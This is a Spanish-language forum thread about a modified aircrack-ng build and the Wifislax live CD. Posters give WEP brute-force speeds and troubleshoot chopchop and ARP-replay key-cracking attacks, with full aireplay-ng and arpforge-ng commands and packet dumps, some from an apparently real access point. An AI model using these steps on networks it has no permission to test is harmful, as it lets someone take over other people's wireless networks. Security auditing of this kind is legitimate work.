respecto a lo q me habes dicho de ese problema lo miro este finde y lo soluciono


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 27 Noviembre 2006, 18:13 pm
Citar
pa cuando la 0.9??
pues en cuanto saquen algo nuevo lo añado.
respecto a lo q me habes dicho de ese problema lo miro este finde y lo soluciono

Como va eso???  ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: thefkboss en 27 Noviembre 2006, 19:08 pm
pues ando liado este mes con los examenes pero quiero meterle algo nuevo.
Bueno lo primero de todo creo q ya he corregido el maldito error ese.
Aqui teneis la version corregida probarla y me contais si se ha solucionado

http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_0.8_revision.tar.gz

en cuanto a la 0.9 estaba mirando haber si puedo cambiar el codigo para hacer fuerza bruta contra WEP de 128.
y quiero meter un creador de diccionario para atake WPA pero no se si lo conseguire.......


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida) ultima pagina
Publicado por: *dudux en 27 Noviembre 2006, 19:56 pm
Citar
en cuanto a la 0.9 estaba mirando haber si puedo cambiar el codigo para hacer fuerza bruta contra WEP de 128.

de cuanto tiempo estamos hablando ,,,con un procesador medio de 1000 a 2000 mhz??????


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida) ultima pagina
Publicado por: thefkboss en 27 Noviembre 2006, 20:46 pm
de mucho....de 1 dia en adelante eh ahi el problema


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: *dudux en 28 Noviembre 2006, 23:38 pm
esta claro que "la fuerza bruta" es el ultimo de los casos y en caso de desesperación.................. Lo más ingenioso es hacer las cosas  mas rápidas posibles , menos cantosas y en menos tiempo........aunque  a veces ya se sabe lo que toca--

no la deseo probar hasta el dia necesario por emergencia o por que se yo,,,, ;D ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: thefkboss en 29 Noviembre 2006, 20:01 pm
pues ya lo tengo terminao pero de tiempos anda un poco jodida la cosa yo creo q minimo una semana encendido para llegar hasta el zzzzzzzzzzzzz (SOLO LETRAS)
Mas o menos tira a 150.000.000 de claves provadas por hora con un AMD XP 1700 eso si mas te vale q lo tengas el micro bien ventilado y no con el disipador q trae de serie.

voy a ver si lo termino de probar y a meter un parche nuevo para q elimine paquetes defectuosos.

Y voy a meterme haber si puedo y tengo tiempo (***** examenes) con la fuerza bruta de WPA (SERIAN SOLO LETRAS DE 8 DIGITOS) y tardaria yo creo q mas o menos lo mismo

Ya os contare


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: *dudux en 29 Noviembre 2006, 20:40 pm
hay estamos......................eso si que es más viable...........malditas WPA....


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (noticias)
Publicado por: thefkboss en 29 Noviembre 2006, 21:00 pm
bueno pues ya estoy currandolo otra vez esta vez digamos q los parches me los he currado yo bueno en parte son modificaciones de otros q ya tenia.

Haber q tendra pues......
tanto diccionario como fuerza bruta con 2 ivs es suficiente para reventarla

ejemplo:

(http://img164.imageshack.us/img164/6953/crackwv3.jpg)

tambien ahora puede hacer fuerza bruta contra wep 128 bytes solo caracteres tarda en todo el proceso una semana es decir si tubiese q llegar a la zzzzzzzzzzzzz el tiempo se reduce si se usan varios ordenadores coneatdos en multitarea.(si se usase podria ser de horas o solo un  dia)

pruebas realizadas con un AMD XP 1700 120.000.000-150.000.000 claves probadas por hora (eso si bien ventilado con disipiador decente (aleacion plata-aluminio 4600 rpm)


voy a ver si me puedo currar algo contra fuerza bruta para WPA con el mismo principio (solo 8 digitos letras)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: *dudux en 29 Noviembre 2006, 22:55 pm
Citar
Haber q tendra pues......
tanto diccionario como fuerza bruta con 2 ivs es suficiente para reventarla

con las WPA?????o que dices¿¿¿


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: thefkboss en 29 Noviembre 2006, 23:19 pm
me referia q lo q he modificado hasta ahora es decir q ya lo tengo funcionando y lo he probado es para WEP solo necesitas 2 IVS para usar diccioanrio contra WEP o para hacer fuerza bruta contra WEP.

Y lo q quiero hacer e fuerza bruta contra WPA eso es lo q tengo q desarrollar


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: *dudux en 1 Diciembre 2006, 03:42 am
La version correjida da gusto!!!!!!!!!!! antes era un poco insoportable y acababa rayandome y poner la suite antigua.....

 ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: HeLLCiTo en 4 Diciembre 2006, 21:32 pm
es la primera vez que pruebo esta version antes estaba solo tasteando bueno me he puesto a capurar paquetes, estoy con un ataque chopchop y un arp normalito, porque avanzantanto los paquetes en mis clientes y no en lo que capturo?

(http://img129.imageshack.us/img129/5867/instantnea2ab7.png)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: pianista en 4 Diciembre 2006, 22:02 pm
Umm seguro que el paquete con el que haces chopchop tenia FromDs 1??
Tiene que venir del AP para que funcione..
En cuanto a los clientes o tienen el emule o quizas el chopchop lo estas haciendo al contrario de como te digo ;)
Saludoss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: HeLLCiTo en 4 Diciembre 2006, 23:05 pm
si tenia fromds 1 , era este

Citar
        Size: 96, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  00:13:02:***
        Source MAC  =  00:13:49:***

        0x0000:  0842 2c00 0013 0214 4585 0013 499d e956  .B,.....E...I..V
        0x0010:  0013 499d e956 9070 3dba 5800 bc07 ae22  ..I..V.p=.X...."
        0x0020:  32fb 6a9c 804c f7e0 d692 0a6f ff80 ff48  2.j..L.....o...H
        0x0030:  4cad 7bc3 b949 c5ab ad69 2ddd a30c 3db4  L.{..I...i-...=.
        0x0040:  a934 d719 98b9 4b88 eecb ff60 5fde 8223  .4....K....`_..#
        0x0050:  8fc8 7f9e 284d 9b36 6479 68b9 5c54 fad6  ...(M.6dyh.\T..

lo forge asi
Citar
arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:*** 0    .168.1.200 192.168.1.1 arp.cap

si embargo el que envio no parece tener fromds

Citar
root@angel-ubuntu:/home/angel# aireplay-ng --interactive -r arp.cap ath1


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:11:22:33:44:55

        0x0000:  0841 0201 0013 499d e956 0011 2233 4455  .A....I..V.."3DU
        0x0010:  ffff ffff ffff 8001 3dba 5800 bc07 ae22  ........=.X...."
        0x0020:  32fb 6a9a c58d ffd8 bf73 0a6e 0290 d9fc  2.j......s.n....
        0x0030:  59d6 8eca 7829 c48a a669 48dc 63a4 3cb5  Y...x)...iH.c.<.
        0x0040:  33bd 7c0a     


la cosa no mejora debo haber forjado o hecho algo mal, pero aun asi el ataque arp debia funcionar.
y en el host , es el4 que sube rapido con 814589 , pero la captura no pasa de 4820


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: pianista en 4 Diciembre 2006, 23:08 pm
Normal que no tenga eso pues lo estas creando para mandarlo...
Umm entonces no se que puede fallar....
Pegame aqui absolutamente todos los comandos que usas y lo que te devuelven... ;)
Saludoss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: HeLLCiTo en 5 Diciembre 2006, 00:24 am
espero que no ocupe mucho.he omitido capturas que ocupaban mucho
Citar
oot@angel-ubuntu:/home/angel# aireplay-ng --chopchop -b 00:13:49:9d:e9:56 ath1
Read 17 packets...

        Size: 96, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:13:49:9D:E9:56
         Dest. MAC  =  00:13:02:***
        Source MAC  =  00:13:49:***

        0x0000:  0842 2c00 0013 0214 4585 0013 499d e956  .B,.....E...I..V
        0x0010:  0013 499d e956 9070 3dba 5800 bc07 ae22  ..I..V.p=.X...."
        0x0020:  32fb 6a9c 804c f7e0 d692 0a6f ff80 ff48  2.j..L.....o...H
        0x0030:  4cad 7bc3 b949 c5ab ad69 2ddd a30c 3db4  L.{..I...i-...=.
        0x0040:  a934 d719 98b9 4b88 eecb ff60 5fde 8223  .4....K....`_..#
        0x0050:  8fc8 7f9e 284d 9b36 6479 68b9 5c54 fad6  ...(M.6dyh.\T..

Use this packet ? yes

Saving chosen packet in replay_src-1204-205205.cap

Offset   95 ( 0% done) | xor = FC | pt = 2A |  813 frames written in  2440ms
......
Offset   37 (93% done) | xor = 8C | pt = C0 | 7428 frames written in 22284ms


The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround:  IP header re-creation.

Saving plaintext in replay_dec-1204-205908.cap
Saving keystream in replay_dec-1204-205908.xor

Completed in 416s (0.14 bytes/s)

root@angel-ubuntu:/home/angel# tcpdump -s 0 -n -e -r replay_dec-1204-205908.cap
reading from file replay_dec-1204-205908.cap, link-type IEEE802_11 (802.11)
20:59:08.419879 DA:00:13:02:***  BSSID:00:13:49:*** SA:00:13:49:9d:e9:5
6 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), et
hertype IPv4 (0x0800): 81.46.53.161 > 192.168.1.33: ICMP time exceeded in-transi
t, length 36

root@angel-ubuntu:/home/angel# arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:9d:e9:56 0
.168.1.200 192.168.1.1 arp.cap
Done.
root@angel-ubuntu:/home/angel# aireplay-ng --interactive -r arp.cap ath1


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:11:22:33:44:55

        0x0000:  0841 0201 0013 499d e956 0011 2233 4455  .A....I..V.."3DU
        0x0010:  ffff ffff ffff 8001 3dba 5800 bc07 ae22  ........=.X...."
        0x0020:  32fb 6a9a c58d ffd8 bf73 0a6e 0290 d9fc  2.j......s.n....
        0x0030:  59d6 8eca 7829 c48a a669 48dc 63a4 3cb5  Y...x)...iH.c.<.
        0x0040:  33bd 7c0a                                3.|.

Use this packet ? y

Saving chosen packet in replay_src-1204-211514.cap
You should also start airodump-ng to capture replies.

End of file.

al final la saque era de una imagenio, aun asi me queda la duda, igual es mejor que movamos esto al tema del chopchop, si eso avisarme y lo pegamos alli y borro o borrais estos post.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: pianista en 5 Diciembre 2006, 16:33 pm
Umm pues no se que te puede fallar, prueba a forjar el paquete con esto, a ver si va a tener un rango restringido de ips...
arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:9d:e9:56 192
.168.1.34 192.168.1.1 arp.cap

Saludoss
PD:Puedes probar los nuevos scripts que ha hecho Alist3r para el chopchop ;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: Wirelesman en 19 Diciembre 2006, 14:06 pm
Hola thefkboss he probado tu versión aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3 para windows, y me encanta, asi que no puedo ni imaginarme como será la 0.8, o la 0.9 en la que estas trabajando. Me gustaria que me dijeras si itenes esas mismas versiones para windows, la verdad que hace mucho tiempo que me tendria que haber pasado a linux, la verdad, pero mi pereza se resiste. Pero bueno, si no consigo estas versiones para windows no tendré mas remedio. je je

Muchas gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (corregida)
Publicado por: thefkboss en 19 Diciembre 2006, 14:50 pm
pues no solo saque la 0.3 para windows pero la 0.9 esta incluida en el wifislax 1.1 beta asi q recomiendo q te lo bajes xq aunque no tengas ni idea de linux los ataques se realizan automaticamente es tan facil como (que quieres hacer: para hacer tal pulsa 1 o pulsa 2)
Asi q bajatela ya veras como te gusta.
no creo q las saque para windows ya q lo bueno de las versiones motherfucker son la parte de inyeccion y en windows no se puede por lo q la version 0.3 de la 0.9 de la parte del aircrack no difieren en mucho solo son 2 cosas mas q le he añadido


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: insig en 19 Diciembre 2006, 21:37 pm
Quizá esté más que comentado pero no lo encuentro (lo he buscado :( )
En wifislax después de usar los madwifi y tal... Como lo hago para usar la tarjeta en modo normal? Ya que se me queda en modo monitor y tengo que reiniciar para poder navegar de nuevo.

Gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: Wirelesman en 19 Diciembre 2006, 22:07 pm
Entonces tengo que ponerme linux obligatoriamente, no. je je, ya sabia que llegaria este dia mas tarde o mas pronto, je je.
Bueno pues bien.
Solo me queda una duda, que es eso se wifislax 1.1 beta?


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: insig en 19 Diciembre 2006, 22:31 pm
Entonces tengo que ponerme linux obligatoriamente, no. je je, ya sabia que llegaria este dia mas tarde o mas pronto, je je.
Bueno pues bien.
Solo me queda una duda, que es eso se wifislax 1.1 beta?


Eso te lo contesto yo mismo ya que estoy ahora mismo en ella. :D Es una distrodibución cd live de linux basada en slax pero preparada para ser auditoria. Es decir que tienes todos los programas y demás en linux en tan sólo un cd sin tener que instalar nada.

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: Wirelesman en 19 Diciembre 2006, 23:59 pm
Entonces es solo grabarme linux y ya me funcionara?


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: insig en 20 Diciembre 2006, 13:59 pm
Aja, y configurar la bios para que arranque desde el cd.

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: cthulhufhtagn en 23 Diciembre 2006, 16:19 pm
¿Alguien más obtiene:

Código:
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/aireplay-ng.c src/common.c -o aireplay-ng
src/aireplay-ng.c: En la función 'openraw':
src/aireplay-ng.c:2431: error: no se conoce el tamaño de almacenamiento de 'ifr'
src/aireplay-ng.c:2438: aviso: el puntero que apunta en el paso del argumento 2 de '__builtin_strncpy' difiere en signo
src/aireplay-ng.c:2431: aviso: variable 'ifr' sin usar
src/aireplay-ng.c: En la función 'read_prn':
src/aireplay-ng.c:2572: aviso: el puntero que apunta en la asignación difiere en signo
src/aireplay-ng.c: En la función 'main':
src/aireplay-ng.c:2872: aviso: el puntero que apunta en el paso del argumento 1 de 'get_ip' difiere en signo
src/aireplay-ng.c:2885: aviso: el puntero que apunta en el paso del argumento 1 de 'get_ip' difiere en signo
src/aireplay-ng.c:3167: aviso: el puntero que apunta en el paso del argumento 1 de 'openraw' difiere en signo
src/aireplay-ng.c:3177: aviso: el puntero que apunta en el paso del argumento 1 de 'openraw' difiere en signo
make: *** [aireplay-ng] Error 1
?


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: thefkboss en 24 Diciembre 2006, 19:20 pm
q distro de linux usas???????


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: cthulhufhtagn en 25 Diciembre 2006, 19:36 pm
Arch, pero ya está "arreglado" :)


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: Basthion en 20 Marzo 2007, 20:16 pm
Creo que el enlace al aircrack-ng-MOTHER-FUCKER EDITION 0.8 Revision no funciona, me parece que hemos alcanzado el límite de transferencia máximo del server... Si alguien fuese tan amable de solucionarlo.

Un saludo.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: TMT en 23 Marzo 2007, 12:09 pm
Lo primero, siento si estas preguntas ya están respondidas pero no he encontrado respuesta para ellas.  :rolleyes:

1. Estoy utilizando el airodump-ng del WifiSlax 2.0 y he notado que la rapidez en capturar IVS baja significativamente a partir de los 100.000 IVSs. ¿Es esto normal?

2. Si la respueta a la pregunta anterior es afirmativa, ¿sirve de algo parar la captura del airodump-ng a los 100.000 y volver a lanzarla otra vez para que vuelva a capturar los 100.000 rápido?

3. Esta pregunta creo que si es de verdadero novato. ¿Hay alguna diferencia práctica en ponerle al airodump-ng que capture solo los IVSs, es decir, genere un fichero .IVS en vez de .CAP?. Es que he notado que el tamaño del fichero .CAP es significativamente más grande. ¿Qué guarda el fichero .CAP diferente al IVS siendo que los beacons no se guardan en ninguno de los 2?

4. ¿Por qué si utilizas la opción -b del airodump-ng poniendole la MAC del AP y el canal te guarda todos los datos de los APs que encuentre en dicho canal y no solo los del AP seleccionado?

Gracias a todos por este trabajo tan bueno.

Saludos.

Gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: pianista en 23 Marzo 2007, 19:30 pm
1.No depende de nada mas que del trafico y la señal que tengas, es normal si deja de navegar...
2.Si podria servir pero despues le tienes que pasar el aircrack a todos los archivos juntos o concatenarlos...
3.El ivs es un vector que lleva informacion sobre la WEP, mientras que los cap llevan balizas, paquetes de control donde vienen ips, etc etc...
Para sacar la WEP, solo necesitas ivs, pero si luego por ejemplo tienes dhcp deshabilitado, tendras que capturar cap...

4.Ummm seguro que la usas correctamente??No me acuerdo ahora mismo pero quizas no sea esa exactamente la opcion para filtrar el sniffer por BSSID...
Haz un airodump-ng --help y miralo ahi....
Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: thefkboss en 25 Marzo 2007, 19:49 pm
la opcion no era -b me parece q era -bssid.(hablo de memoria, no esoty seguro)
hace q no uso esa opcion la tira.


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: TMT en 26 Marzo 2007, 08:53 am
Lo primero, gracias por responder, pero todavía hay cosas que no me quedan claras. Vamos alla.

1.No depende de nada mas que del trafico y la señal que tengas, es normal si deja de navegar...
Estoy lanzando el ataque de reinyección ARP (ataque 3) con lo que no utilizo los paquetes que manda el cliente asociado. Algo me sigue sin cuadrar.

2.Si podria servir pero despues le tienes que pasar el aircrack a todos los archivos juntos o concatenarlos...
El caso es que paso el aircrack-ng *.ivs y aunque me los reconoce todos los ficheros el número total de IVS no es la suma de todos los ivs de los ficheros sino poco más de uno. Por ejemplo;
Fichero IVS 1: 130.000
Fichero IVS 2: 125.000
Fichero IVS 3: 137.000

Paso el aircrack con los 3 ficheros y el número de IVSs con el que trabaja son, por ejemplo, 137.567.

3.El ivs es un vector que lleva informacion sobre la WEP, mientras que los cap llevan balizas, paquetes de control donde vienen ips, etc etc...
Para sacar la WEP, solo necesitas ivs, pero si luego por ejemplo tienes dhcp deshabilitado, tendras que capturar cap...
Esto ya me queda claro.

4.Ummm seguro que la usas correctamente??No me acuerdo ahora mismo pero quizas no sea esa exactamente la opcion para filtrar el sniffer por BSSID...
Haz un airodump-ng --help y miralo ahi....
Según lo que pone en http://hwagm.elhacker.net/htm/aircrack-ng.htm (http://hwagm.elhacker.net/htm/aircrack-ng.htm) la opción -b del aircrack-ng es para    Selecciona la red elegida basándose en la dirección MAC., así es que creo que estará bien.

Gracias otra vez y seguimos aprendiendo.

Saludos
[/quote]


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: thefkboss en 26 Marzo 2007, 15:52 pm
lo de la -b miratelo xq con las nuevas versiones se cambio y mas si usas la del Wifislax 2.0 ya q es el aircrack motherfucker 1.1


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: rtap0 en 29 Marzo 2007, 16:49 pm
aber si alguien puede subir el MF 0.8 q el link no funciona

Pd: thefkboss si pones el 0.9 tambien lo agradezco
pd2: q versiones no muestran los beacons???


Título: Re: Aircrack-ng MotherFucker Edition version 0.9 (wifislax 1.1 beta)
Publicado por: pianista en 29 Marzo 2007, 17:22 pm
Mandame un IM y te lo mando a donde tu quieras... ;)
Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: pianista en 29 Marzo 2007, 18:58 pm
Aqui tienes la 0.8 http://www.megaupload.com/es/?d=BPQ3BZFA
Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: longits en 29 Marzo 2007, 22:00 pm
Que ganas de una nueva actualización del motherfucker!

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: thefkboss en 29 Marzo 2007, 23:10 pm
si tienes el wifislax 2.0 podras dsifrutarla. yo pensaba q os habiais dado cuenta.jajaja


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: rtap0 en 30 Marzo 2007, 16:11 pm
thefkboss no me gusta q el 1.1 muestre los beacons, x eso, el 0.8 no me los mostraba voy a ver si sige en su linea, x cierto muxas gracias por acer el MF, con el ultimo aircrack no podia reinyectar con la ipw, y tenia q usar el 0.3, pero aora no menos mal


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: biker en 10 Abril 2007, 16:32 pm
Nas tardes! Entonces a ver, para los que ya tenemos una distro de Linux instalada y corriendo para nuestras necesidades... cual es la versión más actual del aircrack fo***madres? Porque en el primer mensaje del artista creador los enlaces de las más recientes me mandan a la imagen de una distribución :(


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: thefkboss en 10 Abril 2007, 20:30 pm
pues la ultima q he sacado q no este en distro es la 0.8 las otras solo estan disponibles dentro de los live CD (Wifislax)


Título: Comenzando a Usar Wifislax 2.0 por primera vez. Ayuda
Publicado por: mc668824 en 24 Abril 2007, 01:10 am
Buenas noches, estoy descargando el Wifislax 2.0 por primera vez y he estado leyendo sobre el tema pero no me he enterado mucho, asi que en vez de poneros la cabeza como un bombo preguntando cosas que para vosotros es ya obvio y no querreis repetir... os pido un favor:

Yo ya he hecho mis pinitos con Hux Pupy, pero creo que es muy lento a la hora de capturar. ¿donde puedo encontrar un manual de como instalar Wifislax 2.0? ¿donde puedo encontrar toda la información para instalarlo y que debo de salvar en mi pc? ¿que ficheros adicionales necesito? etc etc, bueno ya sabéis, primero leere todo lo que haya a mi alcance y haré algunas pruebas antes de preguntaros de nuevo.

Muchas Gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: the_often en 24 Abril 2007, 09:59 am
Manual de instalacion:  www.wifislax.com ....  seguridadwireless.net ....

Y mirate este depues este post tambien:

http://foro.elhacker.net/index.php/topic,152932.msg766641.html#msg766641


Me da que has buscado poco poco.

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: mc668824 en 24 Abril 2007, 10:33 am
Gracias the_often, he leido y la cuestion es que yo no quiero instalar en HD sino arrancar y trabajar desde el Live CD... es esto posible? Gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: the_often en 24 Abril 2007, 10:59 am
    Ahí tienes todo lo necesario para su uso y manejo, tanto para modo Live como para instalarlo en el HD.  Claro que es posible su uso en modo Live, puesto que Wifislax es un Live CD. Esto viene en la pagina principal de wifislax.com... no es bueno decir que has leido si no es cierto..... :rolleyes:

Citar
¿donde puedo encontrar un manual de como instalar Wifislax 2.0? ¿donde puedo encontrar toda la información para instalarlo y que debo de salvar en mi pc?

Citar
la cuestion es que yo no quiero instalar en HD sino arrancar y trabajar desde el Live CD... es esto posible?

A ver si nos aclaramos..... :-\

Saludos  :)


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: mc668824 en 24 Abril 2007, 15:23 pm
Perdoname, llevo unos dias un poco estresado y no se lo que escribo, la idea la tengo clara, es a la hora de expresarlo cuando la cago. Y si que he leido, lo que pasa que he leido cosas empezadas ya, por eso reclamaba un Manual desde el principio.

Muchas gracias y disculpad mi total ignorancia. Saludos a todos.


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: the_often en 24 Abril 2007, 20:13 pm
Ok, no pasa nada.

Espero que en los enlaces que te puse encuentres la informacion que necesitas.  Tambien es bueno que le heches un buen vistazo a los temas iniciales de este foro, los que tienen una chincheta roja a la izquierda.

Saludos


Título: Aireplay (wifislax 2.0)
Publicado por: marialulu en 15 Mayo 2007, 00:42 am
Buenas, soy nuevo aquí. He estado leyendo vuestros post pero no encuentro respuesta a mi problema.
Tengo la distrivución Wifislax y una wifi atheros. El airodump me ha ido bien, y el comienzo del aireplay tmb (me he metido en el router), el problema :-( ha comenzado cuando he intentado enviar paquetes: recivia pero no enviaba y me salía el mensaje:
Aireplay open(/dev/rtc): No such device
No se qué hago mal, ¿me podríais ayudar?  :-\
Gracias de antemano


Título: Re: Aireplay (wifislax 2.0)
Publicado por: Torpuss en 15 Mayo 2007, 00:58 am
[quote author=marialulu link=topic=137900.msg777751#msg777751, el problema :-( ha comenzado cuando he intentado enviar paquetes: recivia pero no enviaba y me salía el mensaje:
Aireplay open(/dev/rtc): No such device
No se qué hago mal, ¿me podríais ayudar?  :-\
Gracias de antemano
[/quote]
buenas ,marialulu ,eso tb me sale a mi pero si que inyecto,segun mi poca experiencia ese mensaje sale siempre


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: marialulu en 15 Mayo 2007, 12:13 pm
Buenas Torpus. Gracias por tu respuesta pero creo que no llevas razón ya que no inyecta nada, es más, no consigo aumentar IVs de ninguna manera.  :-\ A ver si hay alguien que nos pueda ayudar.  :rolleyes:
Recuerdo mi error con Aireplay:
Aireplay open(/dev/rtc): No such device
Y recibía pero no enviaba
Gracias y salu2 a TODOS!!


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: SPiKeGoD en 15 Mayo 2007, 18:48 pm
Wenas

muy wapo el proyecto! Gracias a los que lo haceis posible!

Tengo una consulta, y es que ahora que me funciona con lo q tengo no quiero cagarla:

¿cual es la version mas nuevo que se puede usar con ipw2200?

Yo tengo la suite aircrack-ng 0.6 y el aircrack-ptw. Instalado el parche 1.1.4 de ipw2200 y ubunto 6.06

Un saludo


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: unbas en 15 Mayo 2007, 19:30 pm
Para usar en ubuntu ... esta bien lo q tienes ... ademas a mi .. me gusta mucho la 06 del los motherfucker  ;D ;D

Yo creo q lo q tienes esta bien


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: SPiKeGoD en 16 Mayo 2007, 02:32 am
tengo el aircrack-ng 0.6 normal, no el motherfuckers, no me atrevo a tocar nada por si deja de funcionar!!



Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: unbas en 16 Mayo 2007, 15:03 pm
Pues aqui tienes un manual de instalacion de ubuntu + la ipw2200 + aircrack + kismet y algunas cosillas mas efectuado por rh3nt0n

Si lo sigues como el indica no deberias de tener problemas ...


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: SPiKeGoD en 16 Mayo 2007, 16:05 pm
ya, es el q he seguido jeje

y tiene el 0.6 que fue el q baje con el wget !!

Lo que no se es para q sirve el kismet y ethernoseke xD


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: unbas en 16 Mayo 2007, 16:11 pm
Pues si es el q has seguido deberias de tener el ng06 motherfucker .... sino me equivoco ....

Los otros programas son ... uno es parecido al airodump pero con mas opciones y el otro es para analizar datos de captura ...


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: SPiKeGoD en 16 Mayo 2007, 20:37 pm
q recomendais kismet o airodump? y en caso de capturar con kismet alos paketes se le aplica tb aircrack?¿


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: pianista en 16 Mayo 2007, 22:21 pm
Yo creo que a dia de hoy quitando para cosas muy concretas airodump es lo mas sencillo y util ;)
Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: Morket en 26 Mayo 2007, 03:50 am
hola buenas ,,,,,,,

- una cosa el enlace que has puesto thefkboss para el  AIRCRACK MOTHERFUCKER PARA WINDOW , no va , no se descarga tio , lo puedes subir de nuevo porfavor . gracias

un saludo! ;D


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: thefkboss en 26 Mayo 2007, 14:30 pm
si llevas razon se ha roto el enlace.
te lo puedo poner pero mejor te recomiendo q te bajes la ultima version del aicrack-ng de la pagina oficial q lo hay pa windows q tiene lo mismo q el q hice y mas cosas ya q han mejorado la version bastante y el mio se ha quedado viejo


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: Morket en 26 Mayo 2007, 16:39 pm
ahh ok
, gracias  ;)


Título: Re: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: Pepe_LePew en 4 Junio 2007, 23:32 pm
Buenas tardes, estoy intentando instalar la suite Aircrack-ng en Fedora Core 5, pero al dar el comando make me sale el siguiente error:

[root@DirFin2 aircrack-ng-0.9]# make
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/aireplay-ng.c src/common.c src/crc.c -o aireplay-ng
In file included from src/aireplay-ng.c:42:
